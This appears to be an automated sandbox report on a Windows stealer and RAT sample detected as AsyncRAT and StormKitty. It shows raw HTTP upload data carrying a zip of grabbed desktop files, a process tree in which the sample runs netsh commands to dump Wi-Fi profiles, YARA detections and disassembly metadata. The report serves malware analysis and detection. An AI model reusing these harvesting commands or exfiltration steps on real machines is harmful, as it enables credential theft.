                                                            2024-08-20 09:06:35 UTC16355OUTData Raw: 30 ae be da ba 25 2e ac 5b 9f 35 14 fc 88 7c c5 ac 24 d5 93 1f 3c 06 72 21 3b 0b 60 cc fb 21 f2 b7 39 85 20 a7 3d f5 e2 8d 14 ba 9e 77 1d 5b 12 b4 7d b2 40 72 a1 04 28 df 93 9e a7 5d aa 7f 68 9d ca 7a 7d 67 c7 73 3b 79 94 cb 87 73 3d e1 8e 01 c5 7c fb ea f8 54 29 ea 23 4f 35 41 3d d1 dd 98 a4 c7 c0 f1 a8 b1 6f a6 92 df 1e 88 ce 1a d0 af 86 dd 15 8b 14 f3 20 c3 de a6 66 3e 99 c2 89 eb 5c 94 96 2d 38 de 2f 62 3f e6 33 ef da 4a f6 37 df 06 df 59 27 b9 eb d3 96 cf 34 c5 75 b7 a3 d4 3c 4f b1 ec 1f c7 6c 28 18 35 24 31 ef 62 56 c8 fb 78 d0 2b 59 27 f1 5d c8 92 cd 8b ed 14 9a 2d 34 83 a4 36 57 57 33 d5 56 66 4c 17 80 25 d4 b4 f7 85 4f cb da e8 a0 ff fe fc 01 50 4b 03 04 14 00 00 00 08 00 f8 33 45 57 2e 53 12 29 84 02 00 00 02 04 00 00 3f 00 00 00 47 72 61 62 62
                                                            Data Ascii: 0%.[5|$<r!;`!9 =w[}@r(]hz}gs;ys=|T)#O5A=o f>\-8/b?3J7Y'4u<Ol(5$1bVx+Y']-46WW3VfL%OPK3EW.S)?Grabb
                                                            2024-08-20 09:06:35 UTC16355OUTData Raw: 39 ba 7e 52 7e 97 24 f0 cb 6e d2 d3 f7 e4 99 27 ae b6 b9 aa 64 f9 ab 5d 39 c5 b1 8f cf 29 5b da 18 7b 61 44 9a ba 73 5a 65 8e 77 7f 26 a8 1f df 98 ca 5f eb 26 99 88 4e 4b 4b ae 8b d8 a5 5d 2e 53 32 be 9f 23 89 ba fe a0 5a f0 ee 82 8b 5e c2 cd 66 19 b1 cf a2 0b 93 39 b9 9d 7a 9b ae c4 e2 03 94 b5 73 ab 3d ed 92 0f 7c 14 f4 1e 5c 3f 8d 7c d7 35 09 52 71 08 69 b4 57 8a b8 fd 7b ac a6 ff c0 de 47 ee 22 84 d9 a2 d6 b0 56 97 5c a5 ab 1b 84 f2 d7 19 18 ee 0a 5b 33 f2 b3 e2 a1 a6 54 ca d1 61 5b bd b5 43 86 b4 bd 13 ae fc c7 6a ac 2a bd f4 b8 87 ed 31 e2 1e 69 36 fd 4b 8f 44 f2 94 9a c4 db 6a 7e eb 09 9c f0 05 ba ba b3 a7 e2 43 cd ed 3b 8f 5b fb 76 f1 5f d2 1f 6c 73 db cc e0 cd 36 c5 3f 8e 11 c5 ef 5d 3d 75 aa d2 2b 28 9c bf f0 8d f1 52 ac 14 d5 eb 11 7b a9 4b 6a
                                                            Data Ascii: 9~R~$n'd]9)[{aDsZew&_&NKK].S2#Z^f9zs=|\?|5RqiW{G"V\[3Ta[Cj*1i6KDj~C;[v_ls6?]=u+(R{Kj
                                                            2024-08-20 09:06:35 UTC16355OUTData Raw: dd f5 0a 53 be 55 b8 9d 8c f2 bc d9 db 92 c5 fc e3 c7 5c f2 f7 ef b0 d3 f6 36 a5 1f 9b f3 78 9d 6f 72 e8 e9 ba ba 28 a3 37 ce a7 2c 0e 71 3d a5 2d 1d 57 86 2d 38 c2 44 b2 92 e6 2e 52 25 49 4e 69 95 cd 47 e4 fa 65 d3 18 11 01 96 d4 5e 97 7a ec c1 e9 e8 27 f4 6e ed 35 04 b4 0e e2 01 9d a5 6f d6 f3 13 cb f4 2c 71 46 50 4f cf 62 ab a1 6d b6 cd 49 d7 6d 41 cb 54 c1 24 bd 1f 07 db 30 0e 03 7e d5 2f 89 9d aa ee 71 8c ec 59 44 00 6e 22 dd f6 8b d7 26 e0 b7 70 4a 78 da a5 58 81 cf ec 5f 63 00 7a 99 98 65 6b b1 2f 8d 62 0d f1 4e d7 7c be 7b 58 6c 80 9d 68 e6 24 5e da 54 bd 30 b9 88 2a 95 7a 17 33 b9 3b 3c 53 e6 de e2 6d 77 cd ed 5d ba 91 8f dc ad c4 8f 91 9f 77 ce 88 0f 34 2a 75 a1 1f f6 b7 f9 7d 6c b9 a8 82 17 c3 e0 df 0e 36 61 e0 50 7f 6e fe 43 25 b8 ee 38 f4 f8
                                                            Data Ascii: SU\6xor(7,q=-W-8D.R%INiGe^z'n5o,qFPObmImAT$0~/qYDn"&pJxX_czek/bN|{Xlh$^T0*z3;<Smw]w4*u}l6aPnC%8
                                                            2024-08-20 09:06:35 UTC16355OUTData Raw: 67 19 51 7c 1e 41 42 bd d1 58 5f 04 b1 92 1d ad 5e 68 be 8b 0e 08 e4 54 c5 c3 4a 12 0e d1 81 1f e9 34 1f 0e d0 83 31 b6 2f 9f ed 2c 27 9a dc ad b3 21 2c 5d dd 3e bc ed c6 59 70 47 47 0d 18 ae ae a2 81 f6 8d 0e 64 7e 86 3c 91 34 ed 31 61 a0 30 5d 5d 7c fe 54 49 bc 28 19 2f e6 2a 35 f5 b0 f4 b0 c3 3e 53 97 82 1a 03 bf 6e b6 91 dc 1b e0 c6 82 45 a8 c5 1a 3a 80 b8 bc 7a b5 f2 33 a1 54 35 c6 3e f8 f3 9a 04 b4 6f 01 c1 9a 63 65 8a 0e 84 b7 3d 92 94 b2 51 48 2c ff a1 46 f3 19 a0 31 69 2c e9 a3 a0 da b7 40 2e df ee f3 36 3c 32 e5 af 8d 69 a0 25 83 db 5f cf 5b 5f de 3c 95 02 f7 f3 bf 3c 6d e8 c0 75 69 c6 3b 76 b4 5a 8b 95 19 c6 a1 a4 bd e5 53 6e 96 ca a8 47 83 c1 4b 44 c4 ba 1b c9 6e 02 aa ec ff 99 b2 f3 b5 4b 27 5f f9 34 d9 70 4e 95 0e 34 7e 44 fd e6 43 e5 b7 a3
                                                            Data Ascii: gQ|ABX_^hTJ41/,'!,]>YpGGd~<41a0]]|TI(/*5>SnE:z3T5>oce=QH,F1i,@.6<2i%_[_<<mui;vZSnGKDnK'_4pN4~DC
                                                            2024-08-20 09:06:35 UTC16355OUTData Raw: 9a 55 3d f3 b3 79 7b 84 c9 b7 63 7b 5f f4 d5 15 90 04 2f 72 ce 8b fa 15 5f 1b 0b 9c 30 8f ff 95 8b 77 b2 fa f8 6e 6a b1 42 f0 56 88 f2 a0 97 84 f3 c3 94 ea 43 eb f6 28 f0 b0 84 ff 1c d6 44 60 67 cb e7 64 ce ef 27 27 07 13 07 6e 67 92 12 13 38 63 04 15 76 54 ef cc 12 78 f8 f9 7b c6 37 3d c2 f8 d0 d5 9b 09 44 c3 8b cf 9d 36 2e cd 9f 83 a7 95 cd ff da 6c f3 a7 a4 05 ed d8 52 0c ff fb 03 1a 89 17 54 ee 62 ff 0f a7 46 58 f3 ff 20 d6 05 83 63 d2 bf dc 73 8c 7c 1d 7c 2b 25 c7 f8 43 06 0d a9 f6 42 b9 7a c6 51 54 32 19 cb c7 76 2a b0 9e 69 bf 8e 08 8c 04 94 80 20 24 69 94 97 73 dc be 60 00 a3 09 c6 d0 cc 0c 06 52 3e c6 aa 50 bf c5 73 ca ce 74 b8 13 1a 0e 64 50 d9 6d 4e 2a 40 36 c4 2c 22 9c 41 99 51 fe d2 60 07 a9 2f 81 68 d7 8e 61 14 50 c1 8c d7 40 47 ae 45 87 51
                                                            Data Ascii: U=y{c{_/r_0wnjBVC(D`gd''ng8cvTx{7=D6.lRTbFX cs||+%CBzQT2v*i $is`R>PstdPmN*@6,"AQ`/haP@GEQ
                                                            2024-08-20 09:06:35 UTC4819OUTData Raw: 00 00 c8 3b 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41 4c 52 47 55 43 56 45 48 5c 45 49 56 51 53 41 4f 54 41 51 2e 70 6e 67 50 4b 01 02 14 00 14 00 00 00 08 00 f8 33 45 57 83 7c 77 bd 84 02 00 00 02 04 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 3e 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41 4c 52 47 55 43 56 45 48 5c 45 4f 57 52 56 50 51 43 43 53 2e 70 64 66 50 4b 01 02 14 00 14 00 00 00 08 00 f8 33 45 57 2e 53 12 29 84 02 00 00 02 04 00 00 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 84 41 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41
                                                            Data Ascii: ;Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EIVQSAOTAQ.pngPK3EW|w<>Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.pdfPK3EW.S)=AGrabber\DRIVE-C\Users\user\Desktop\PA
                                                            2024-08-20 09:06:35 UTC25INHTTP/1.1 100 Continue
                                                            2024-08-20 09:06:35 UTC405INHTTP/1.1 401 Unauthorized
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:35 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 58
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:05:06:14
                                                            Start date:20/08/2024
                                                            Path:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\vYz1Z2heor.exe"
                                                            Imagebase:0xc0000
                                                            File size:179'200 bytes
                                                            MD5 hash:7F1630DF6B57AF024A3B561BDADC208F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:2
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                            Imagebase:0xd70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff620390000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\SysWOW64\chcp.com
                                                            Wow64 process (32bit):true
                                                            Commandline:chcp 65001
                                                            Imagebase:0x8f0000
                                                            File size:12'800 bytes
                                                            MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:netsh wlan show profile
                                                            Imagebase:0x1160000
                                                            File size:82'432 bytes
                                                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr All
                                                            Imagebase:0x1000000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                            Imagebase:0xd70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff620390000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:05:06:26
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\SysWOW64\chcp.com
                                                            Wow64 process (32bit):true
                                                            Commandline:chcp 65001
                                                            Imagebase:0x8f0000
                                                            File size:12'800 bytes
                                                            MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:05:06:27
                                                            Start date:20/08/2024
                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:netsh wlan show networks mode=bssid
                                                            Imagebase:0x1160000
                                                            File size:82'432 bytes
                                                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:16.3%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:3%
                                                              Total number of Nodes:101
                                                              Total number of Limit Nodes:0
                                                              execution_graph 23346 5180b20 23347 5180b42 LdrInitializeThunk 23346->23347 23349 5180b7c 23347->23349 23350 5185320 23351 5185366 KiUserCallbackDispatcher 23350->23351 23353 51853b9 23351->23353 23235 c10888 23236 c108a3 23235->23236 23241 c175e6 23236->23241 23255 c17598 23236->23255 23269 c17588 23236->23269 23237 c10902 23242 c175f1 23241->23242 23247 c17602 23242->23247 23283 c17ee6 23242->23283 23288 c17e85 23242->23288 23293 c17ea2 23242->23293 23298 c17f03 23242->23298 23303 c17f20 23242->23303 23308 c17ebf 23242->23308 23313 c17e38 23242->23313 23318 c17f53 23242->23318 23323 c17f70 23242->23323 23328 c17e68 23242->23328 23333 c17e29 23242->23333 23247->23237 23256 c175b7 23255->23256 23257 c17602 23256->23257 23258 c17f20 2 API calls 23256->23258 23259 c17f03 2 API calls 23256->23259 23260 c17ea2 2 API calls 23256->23260 23261 c17e85 2 API calls 23256->23261 23262 c17ee6 2 API calls 23256->23262 23263 c17e29 2 API calls 23256->23263 23264 c17e68 2 API calls 23256->23264 23265 c17f70 2 API calls 23256->23265 23266 c17f53 2 API calls 23256->23266 23267 c17e38 2 API calls 23256->23267 23268 c17ebf 2 API calls 23256->23268 23257->23237 23258->23257 23259->23257 23260->23257 23261->23257 23262->23257 23263->23257 23264->23257 23265->23257 23266->23257 23267->23257 23268->23257 23270 c175b7 23269->23270 23271 c17602 23270->23271 23272 c17f20 2 API calls 23270->23272 23273 c17f03 2 API calls 23270->23273 23274 c17ea2 2 API calls 23270->23274 23275 c17e85 2 API calls 23270->23275 23276 c17ee6 2 API calls 23270->23276 23277 c17e29 2 API calls 23270->23277 23278 c17e68 2 API calls 23270->23278 23279 c17f70 2 API calls 23270->23279 23280 c17f53 2 API calls 23270->23280 23281 c17e38 2 API calls 23270->23281 23282 c17ebf 2 API calls 23270->23282 23271->23237 23272->23271 23273->23271 23274->23271 23275->23271 23276->23271 23277->23271 23278->23271 23279->23271 23280->23271 23281->23271 23282->23271 23284 c17eeb 23283->23284 23285 c17f8b 23284->23285 23338 5180a6a 23284->23338 23342 5180a7c 23284->23342 23285->23247 23289 c17e8a 23288->23289 23290 c17f8b 23289->23290 23291 5180a6a KiUserExceptionDispatcher 23289->23291 23292 5180a7c KiUserExceptionDispatcher 23289->23292 23290->23247 23291->23290 23292->23290 23294 c17ea7 23293->23294 23295 c17f8b 23294->23295 23296 5180a6a KiUserExceptionDispatcher 23294->23296 23297 5180a7c KiUserExceptionDispatcher 23294->23297 23295->23247 23296->23295 23297->23295 23299 c17f08 23298->23299 23300 c17f8b 23299->23300 23301 5180a6a KiUserExceptionDispatcher 23299->23301 23302 5180a7c KiUserExceptionDispatcher 23299->23302 23300->23247 23301->23300 23302->23300 23304 c17f25 23303->23304 23305 c17f8b 23304->23305 23306 5180a6a KiUserExceptionDispatcher 23304->23306 23307 5180a7c KiUserExceptionDispatcher 23304->23307 23305->23247 23306->23305 23307->23305 23309 c17ec4 23308->23309 23310 c17f8b 23309->23310 23311 5180a6a KiUserExceptionDispatcher 23309->23311 23312 5180a7c KiUserExceptionDispatcher 23309->23312 23310->23247 23311->23310 23312->23310 23314 c17e5e 23313->23314 23315 c17f8b 23314->23315 23316 5180a6a KiUserExceptionDispatcher 23314->23316 23317 5180a7c KiUserExceptionDispatcher 23314->23317 23315->23247 23316->23315 23317->23315 23319 c17f58 23318->23319 23320 c17f8b 23319->23320 23321 5180a6a KiUserExceptionDispatcher 23319->23321 23322 5180a7c KiUserExceptionDispatcher 23319->23322 23320->23247 23321->23320 23322->23320 23324 c17f75 23323->23324 23325 c17f8b 23324->23325 23326 5180a6a KiUserExceptionDispatcher 23324->23326 23327 5180a7c KiUserExceptionDispatcher 23324->23327 23325->23247 23326->23325 23327->23325 23329 c17e6d 23328->23329 23330 c17f8b 23329->23330 23331 5180a6a KiUserExceptionDispatcher 23329->23331 23332 5180a7c KiUserExceptionDispatcher 23329->23332 23330->23247 23331->23330 23332->23330 23334 c17e5e 23333->23334 23335 c17f8b 23334->23335 23336 5180a6a KiUserExceptionDispatcher 23334->23336 23337 5180a7c KiUserExceptionDispatcher 23334->23337 23335->23247 23336->23335 23337->23335 23339 5180a7d 23338->23339 23340 5180a82 KiUserExceptionDispatcher 23339->23340 23341 5180a95 23339->23341 23340->23339 23341->23285 23343 5180a7d 23342->23343 23344 5180a82 KiUserExceptionDispatcher 23343->23344 23345 5180a95 23343->23345 23344->23343 23345->23285

                                                              Executed Functions

                                                              Function 05180B20 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 589 5180b20-5180b75 LdrInitializeThunk 593 5180b7c-5180b83 589->593 594 5180bcb-5180be4 593->594 595 5180b85-5180bb9 593->595 598 5180bef 594->598 599 5180be6 594->599 595->594 604 5180bbb-5180bc5 595->604 600 5180bf0 598->600 599->598 600->600 604->594
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d253f8aeeac3678421e290770ff3646ae5e42c7e2cd402a14ab67b7ddb7b97fc
                                                              • Instruction ID: 77f3d73c1894a419d515e561b7035add5f956bfc1f5146c0b04dc14662a72a9c
                                                              • Opcode Fuzzy Hash: d253f8aeeac3678421e290770ff3646ae5e42c7e2cd402a14ab67b7ddb7b97fc
                                                              • Instruction Fuzzy Hash: 612151357006188FC768EB68C594BAE37F2EB8E305F240479D406A7369DF719D86EB90
                                                              Function 00C15AC0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 606 c15ac0-c15b26 608 c15b70-c15b72 606->608 609 c15b28-c15b33 606->609 611 c15b74-c15b8d 608->611 609->608 610 c15b35-c15b41 609->610 612 c15b43-c15b4d 610->612 613 c15b64-c15b6e 610->613 618 c15bd9-c15bdb 611->618 619 c15b8f-c15b9b 611->619 614 c15b51-c15b60 612->614 615 c15b4f 612->615 613->611 614->614 617 c15b62 614->617 615->614 617->613 621 c15bdd-c15c35 618->621 619->618 620 c15b9d-c15ba9 619->620 622 c15bab-c15bb5 620->622 623 c15bcc-c15bd7 620->623 630 c15c37-c15c42 621->630 631 c15c7f-c15c81 621->631 624 c15bb7 622->624 625 c15bb9-c15bc8 622->625 623->621 624->625 625->625 627 c15bca 625->627 627->623 630->631 633 c15c44-c15c50 630->633 632 c15c83-c15c9b 631->632 640 c15ce5-c15ce7 632->640 641 c15c9d-c15ca8 632->641 634 c15c73-c15c7d 633->634 635 c15c52-c15c5c 633->635 634->632 636 c15c60-c15c6f 635->636 637 c15c5e 635->637 636->636 639 c15c71 636->639 637->636 639->634 642 c15ce9-c15d3a 640->642 641->640 643 c15caa-c15cb6 641->643 651 c15d40-c15d4e 642->651 644 c15cd9-c15ce3 643->644 645 c15cb8-c15cc2 643->645 644->642 647 c15cc4 645->647 648 c15cc6-c15cd5 645->648 647->648 648->648 649 c15cd7 648->649 649->644 652 c15d50-c15d56 651->652 653 c15d57-c15db7 651->653 652->653 660 c15dc7-c15dcb 653->660 661 c15db9-c15dbd 653->661 663 c15ddb-c15ddf 660->663 664 c15dcd-c15dd1 660->664 661->660 662 c15dbf 661->662 662->660 666 c15de1-c15de5 663->666 667 c15def-c15df3 663->667 664->663 665 c15dd3 664->665 665->663 666->667 670 c15de7-c15dea call c10c34 666->670 668 c15e03-c15e07 667->668 669 c15df5-c15df9 667->669 672 c15e17-c15e1b 668->672 673 c15e09-c15e0d 668->673 669->668 671 c15dfb-c15dfe call c10c34 669->671 670->667 671->668 677 c15e2b-c15e2f 672->677 678 c15e1d-c15e21 672->678 673->672 676 c15e0f-c15e12 call c10c34 673->676 676->672 681 c15e31-c15e35 677->681 682 c15e3f 677->682 678->677 680 c15e23 678->680 680->677 681->682 683 c15e37 681->683 684 c15e40 682->684 683->682 684->684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m
                                                              • API String ID: 0-3751104571
                                                              • Opcode ID: f033a683366ee7ed4f870a5ed4ba7d100224771e1f6a37c34f1cc98f7bbd008d
                                                              • Instruction ID: 20c4e37dc59aa4b2c7268fba0fe4f3701b68d57740fd88562050f6dbbb15672c
                                                              • Opcode Fuzzy Hash: f033a683366ee7ed4f870a5ed4ba7d100224771e1f6a37c34f1cc98f7bbd008d
                                                              • Instruction Fuzzy Hash: 14B17E70E00709CFDB10DFA9D9957DDBBF2AF89304F248129D425AB294EB749982DF81
                                                              Function 00C16390 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9955e1b324b8c8bef009e53800ed2f6a8096af95b4486e5b1ff98065870c2c2d
                                                              • Instruction ID: 76db88593a95fa15d3ffd560d76adc28c0d7044fc124591eb16f65680d414f62
                                                              • Opcode Fuzzy Hash: 9955e1b324b8c8bef009e53800ed2f6a8096af95b4486e5b1ff98065870c2c2d
                                                              • Instruction Fuzzy Hash: FBB14C70E00209DFDF10CFA9D8817EDBBF2AF89354F148129E815AB394EB749985DB91
                                                              Function 05185D52 Relevance: .3, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 853fe1dc11b4753e5b918bbea75455d7fcae46e61fb4e62e727933b1bcd9668d
                                                              • Instruction ID: 11a7789814f8230538ecfbe73093d75278d31f038db2d01ea014610ee31f662b
                                                              • Opcode Fuzzy Hash: 853fe1dc11b4753e5b918bbea75455d7fcae46e61fb4e62e727933b1bcd9668d
                                                              • Instruction Fuzzy Hash: 85D15EB142A7058BD720DF68E84E2997FB1FB85324F524609F1656F2E4EFB4144ACF84
                                                              Function 00C11760 Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 48 c11760-c1177f 49 c11785-c117f7 call c10af8 48->49 50 c11a2a-c11a65 48->50 77 c117fd-c11874 49->77 60 c11a67-c11a8b 50->60 61 c11a09-c11a20 50->61 64 c11ab6-c11abf 60->64 65 c11ac1-c11ac7 64->65 66 c11a8d-c11a96 64->66 68 c11a98-c11aa6 66->68 69 c11aca-c11bad call c10b34 66->69 68->69 70 c11aa8-c11aac 68->70 115 c11baf call c11bd0 69->115 116 c11baf call c11be0 69->116 71 c11ab3 70->71 72 c11aae-c11ab0 70->72 71->64 72->71 96 c11876-c11889 77->96 97 c1188b-c118af 77->97 98 c118b6-c118ba 96->98 97->98 101 c118c5-c118c6 98->101 102 c118bc 98->102 101->61 102->101 113 c11bb5-c11bcd 115->113 116->113
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (q$Teq$dOt
                                                              • API String ID: 0-1630157752
